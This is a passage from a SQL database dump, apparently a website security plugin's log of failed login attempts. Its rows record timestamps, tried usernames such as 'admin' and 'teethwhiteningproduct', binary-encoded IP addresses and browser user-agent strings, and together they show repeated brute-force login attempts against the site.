Firefox/62.0'),(4768,6281,1629104701.221843,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���?�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4769,6282,1629105802.134653,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�c','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4770,6283,1629106489.540580,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@o~ ','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(4771,6284,1629106993.457197,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\'7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4772,6285,1629108155.165584,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��Cܸ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4773,6286,1629109454.747902,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4774,6287,1629109519.960597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(4775,6288,1629110128.806637,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��Ǩf�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36'),(4776,6289,1629110198.255121,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0���ʖD','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36'),(4777,6290,1629110793.618397,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��t���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4778,6291,1629112559.361109,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(4779,6292,1629113521.217310,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4780,6293,1629114878.877551,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���ɬL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4781,6294,1629115607.419387,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��(z��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(4782,6295,1629116041.076054,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���aG�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4783,6296,1629117306.313720,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����k�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4784,6297,1629118388.306463,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��h���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4785,6298,1629119734.620801,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g ��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4786,6299,1629120983.498042,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4787,6300,1629122169.933212,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��R@�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4788,6301,1629123403.592681,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����ʜ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4789,6302,1629123824.335055,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0'),(4790,6303,1629124637.777057,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��]�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4791,6304,1629127160.907533,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0�����m','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4792,6305,1629128492.988768,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��`L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4793,6306,1629129646.923634,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4794,6307,1629130372.378082,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0'),(4795,6308,1629132273.591958,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��M�~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4796,6309,1629133527.546118,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3O2T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4797,6309,1629133527.584244,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��3O2T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4798,6310,1629134919.844443,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-�f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4799,6311,1629136064.990703,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��.e\Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4800,6312,1629136502.016075,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0'),(4801,6313,1629138421.750653,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4802,6314,1629138431.252444,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4803,6315,1629138442.652469,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4804,6316,1629138448.214028,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4805,6317,1629138453.696567,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4806,6318,1629138457.332985,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4807,6319,1629138468.386694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4808,6320,1629138472.896575,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4809,6321,1629138477.933032,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4810,6322,1629138481.284603,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4811,6323,1629138486.587155,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4812,6324,1629138490.407334,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4813,6325,1629138494.352542,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4814,6325,1629138494.487696,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4815,6326,1629138496.312248,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4816,6326,1629138497.158465,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4817,6327,1629138498.841890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4818,6328,1629138500.298015,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4819,6328,1629138500.376670,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��b�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36'),(4820,6330,1629138747.996938,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��P��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4821,6331,1629141354.319421,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4822,6332,1629142603.647341,1,'loginFailInvalidUsername','wakgos',0,'\0\0\0\0\0\0\0\0\0\0��g|_/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4823,6333,1629143303.262525,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�V','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MS-RTC LM 8; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)'),(4824,6334,1629143909.208212,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4825,6335,1629145174.751657,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��mꠙ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4826,6336,1629146523.806410,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4827,6337,1629147537.802259,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(4828,6337,1629147537.846082,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�;�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0'),(4829,6338,1629147711.869272,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��N�/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4830,6339,1629148986.530510,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����k�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4831,6340,1629150339.434611,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��`L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4832,6341,1629151672.167029,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��Cܸ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4833,6342,1629154378.633250,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��P��\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4834,6343,1629154679.611658,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4835,6344,1629154686.721549,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4836,6345,1629154695.462187,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4837,6346,1629154699.598187,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4838,6347,1629154702.699908,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4839,6348,1629154706.380951,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4840,6349,1629154710.522014,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4841,6350,1629154712.935716,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4842,6351,1629154715.974673,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4843,6352,1629154718.336669,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4844,6353,1629154719.334841,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4845,6354,1629154720.555492,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4846,6355,1629154721.431360,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4847,6355,1629154721.521204,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4848,6356,1629154722.886349,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4849,6356,1629154723.113209,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4850,6357,1629154724.150815,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4851,6358,1629154725.151201,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4852,6358,1629154725.178542,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Y��~','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(4853,6360,1629155623.281938,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��mꠙ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4854,6361,1629157007.425181,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g⋙','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4855,6362,1629158288.205007,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��\"I�w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4856,6363,1629159703.297034,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��*p&U','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4857,6364,1629162369.298019,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4858,6365,1629164238.464510,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��?���','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(4859,6366,1629165133.548353,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4860,6367,1629166490.972128,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��3Q�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4861,6368,1629167816.961317,1,'loginFailInvalidUsername','johnmiller83',0,'\0\0\0\0\0\0\0\0\0\0����U�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4862,6369,1629169248.036505,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\\�z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4863,6370,1629170562.566684,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4864,6371,1629170931.988751,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0'),(4865,6372,1629172008.553301,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\'7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4866,6373,1629173347.825384,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��g\'7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4867,6374,1629174781.884637,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�>=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4868,6375,1629176117.961093,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��|�<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4869,6376,1629177477.948867,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0���:�3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(4870,6377,1629205903.106646,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��k�.6','Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0'),(4871,6378,1629206195.181168,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4872,6379,1629206196.358509,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4873,6380,1629206540.652851,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4874,6381,1629206541.240201,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4875,6382,1629206876.286644,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4876,6383,1629206878.088064,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4877,6384,1629207119.485422,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4878,6385,1629207120.128920,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4879,6386,1629207339.529311,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4880,6387,1629207340.349578,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4881,6388,1629207641.168861,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4882,6389,1629207641.964031,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4883,6390,1629208124.971953,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4884,6391,1629208125.464836,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4885,6392,1629208735.430213,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4886,6393,1629208735.928345,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1'),(4887,6394,1629208930.486944,1,'loginFailInvalidUsername','teethwhiteningproduct',0,'\0\0\0\0\0\0\0\0\0\0��N��','Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 